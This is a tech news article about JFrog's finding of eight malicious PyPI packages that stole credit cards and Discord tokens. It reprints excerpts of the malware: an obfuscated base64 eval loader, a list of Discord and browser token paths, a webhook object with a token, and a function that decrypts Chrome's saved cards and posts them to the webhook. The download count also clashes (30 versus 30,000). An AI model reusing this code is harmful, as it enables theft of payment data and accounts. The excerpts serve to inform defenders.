Register Now (2)

Python Official Repository Found to Be Housing Credit-Card Stealing Malware

Many perceive it to be due to negligence by Python's moderators.

TL;DR

JFrog cybersecurity researchers, on July 29, 2021, have detected malicious packages existing in PyPI, Python's official library. The packages were comprised of credit-card stealing malware.

They easily distribute viruses and launch successful attacks on developers and CI/CD pipelines.
They easily distribute viruses and launch successful attacks on developers and CI/CD pipelines.
Key Facts
  1. 1

    Eight different packages were listed as malware.

  2. 2

    The packages spawn of the devil were downloaded more than 30 times from PyPI.

  3. 3

    The malicious packages also impersonate users with the use of Discord codes.

Details

The rate at which PyPI and other public repositories have been vulnerable to frequent supply chain attacks that could have been easily fended off with proper security is appallingly alarming. RubyGems, PyPI, npm have corrupted repositories and unsuspecting developers in common. Streams of supply chain attacks, big and small, take place on these hubs, waiting for trusting developers to download them, natural order.

In this case, eight different packages from 3 maintainers were detected in PyPI's library hub. They were taken down immediately after JFrog informed PyPI, but they had been downloaded over 30,000 times, according to data from pepy.tech. Inconveniently enough, research is still on to determine the actual impact of this attack.

According to JFrog, credit card details stealing wasn't the only activity the packages were orchestrating; using code from the Discord messaging platform, the actors could impersonate the user.

This would seem like a more minor event than the dependency confusion attacks uncovered by Sonatype in the earliness of March. That attack was greater in both the targets (Amazon, Microsoft, Zillow, Lyft), the tension, and the impact. A name familiar with the incident that had Microsoft hire researchers to attack itself and this incident is Python thanks to its fallible repository, PyPI. In the history of studies, almost half of the packages in PyPI have been indicated with a security hole. Public repository moderators have to step up security when it comes to uploaded packages. While a no-trust approach would be seen as "going too far," malicious actors currently have their jobs too easy. They easily distribute viruses and launch successful attacks on developers and CI/CD pipelines.

The continued discovery of malicious software packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks. The ability for attackers to use simple obfuscation techniques to introduce malware means developers have to be concerned and vigilant
avatar
Asaf Karas
CTO Security at JFrog

The lack of moderation and automated security safeguards in PyPI and other public software repositories, according to the researchers, makes it relatively easy for threat actors to inject harmful code.

Getting around obfuscation might have proven to be challenging for the boy scouts but not JFrog's array of impressive tools.

Below is a brief version of the noblesse 2 main code:

import base64, codecs
magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...'
love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...'
god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...'
destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec'))

And here, the Discord authentication token stealer code.

local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')

paths = {
    'Discord': roaming + '\\Discord',
    'Discord Canary': roaming + '\\discordcanary',
    'Discord PTB': roaming + '\\discordptb',
    'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
    'Opera': roaming + '\\Opera Software\\Opera Stable',
    'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
    'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}

Noblesse payload #2 – Stealing Autocomplete sensitive data.

{
  "type": 1,
  "id": "807327703082074143",
  "name": "Captain Hook",
  "avatar": null,
  "channel_id": "725001140324008047",
  "guild_id": "720931953251057725",
  "application_id": null,
  "token": "uwAgm7PQaROJB3USUNDv1RT7uJzfidUsHBsC_y0p2qtChlzNVgpG1vw2zAtkFX-8Xq-x"
}

For users that do this:

image.png

This is what the malware sees:

def cs():
    master_key = master()
    login_db = os.environ['USERPROFILE'] + os.sep + \
        r'AppData\Local\Google\Chrome\User Data\default\Web Data'
    shutil.copy2(login_db,
                 "CCvault.db")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = dpw(
                encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
            hook.send(
							f"CARD-NAME: " + 
							username + 
							"\nNUMBER: " 
							+ decrypted_password + 
							"\nEXPIRY M: " + 
							str(expire_mon) + 
							"\nEXPIRY Y: " + 
							str(expire_year) + 
							"\n" + 
							"*" * 10 + 
							"\n"
						)

JFrog suggests that developers must thread carefully when downloading from public repositories, verify library signatures in their CI/CD pipelines, and, if needed, acquire tools that flag malicious code.


Get similar news in your inbox weekly, for free

Share this news:
Register Now (2)

Latest stories


The fastest way to ramp up on DevOps

You probably have been thinking of moving to DevOps or learning DevOps as a beginner. …

Why You Need a Blockchain Node Provider

In this article, we briefly cover the concept of blockchain nodes provider and explain why …

Top 5 Virtual desktop Provides in 2022

Here are the top 5 virtual desktop providers who offer a range of benefits such …

Why Your Business Should Connect Directly To Your Cloud

Today, companies make the most use of cloud technology regardless of their size and sector. …

7 Must-Watch DevSecOps Videos

Security is a crucial part of application development and DevSecOps makes it easy and continuous.The …

Top Ways To Optimize Your Cyber Security And Performance Monitoring Tools Using Load Balancing

In this post, you will learn how to optimize your cybersecurity and performance monitoring tools …